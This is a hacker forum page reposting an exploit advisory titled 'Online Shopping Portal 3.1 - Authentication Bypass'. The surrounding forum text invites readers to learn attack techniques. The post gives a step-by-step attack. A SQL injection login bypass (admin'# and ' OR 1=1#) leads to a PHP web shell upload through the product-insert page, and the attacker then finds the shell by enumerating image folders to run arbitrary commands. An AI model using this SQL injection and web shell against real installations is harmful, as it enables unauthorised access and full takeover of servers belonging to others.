跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Online Shopping Portal 3.1 - Authentication Bypass

精选回复

发布于
# Exploit Title: Online Shopping Portal 3.1 - Authentication Bypass
# Date: 2020-06-25
# Exploit Author: Ümit Yalçın
# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/
# Version: 3.1
# Tested on: Windows 10 / WampServer

1- Authentication Bypass

Go to following url!
http://localhost/shopping/admin/

Default admin username is admin, to bypass authentication use sql bypass like '# or ' OR 1=1#

username = admin'#
passwrod = what ever you want


2- Uploading Shell to Remote Code Execution

After bypassed the authentication go to insert-product field
http://localhost/shopping/admin/insert-product.php


after that, upload you shell , as an example

<?php
$exe = shell_exec($_REQUEST['cmd']);
echo $exe;
?>


and go to http://localhost/shopping/admin/productimages/ and all possible folders named with number from 1 like 

http://localhost/shopping/admin/productimages/1
http://localhost/shopping/admin/productimages/2
http://localhost/shopping/admin/productimages/3
http://localhost/shopping/admin/productimages/4
http://localhost/shopping/admin/productimages/5

When you find your shell, for example you found at 21

TARGET/shopping/admin/productimages/21/shell.php?cmd=CODE_YOU_WANT_TO_EXECUTE
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。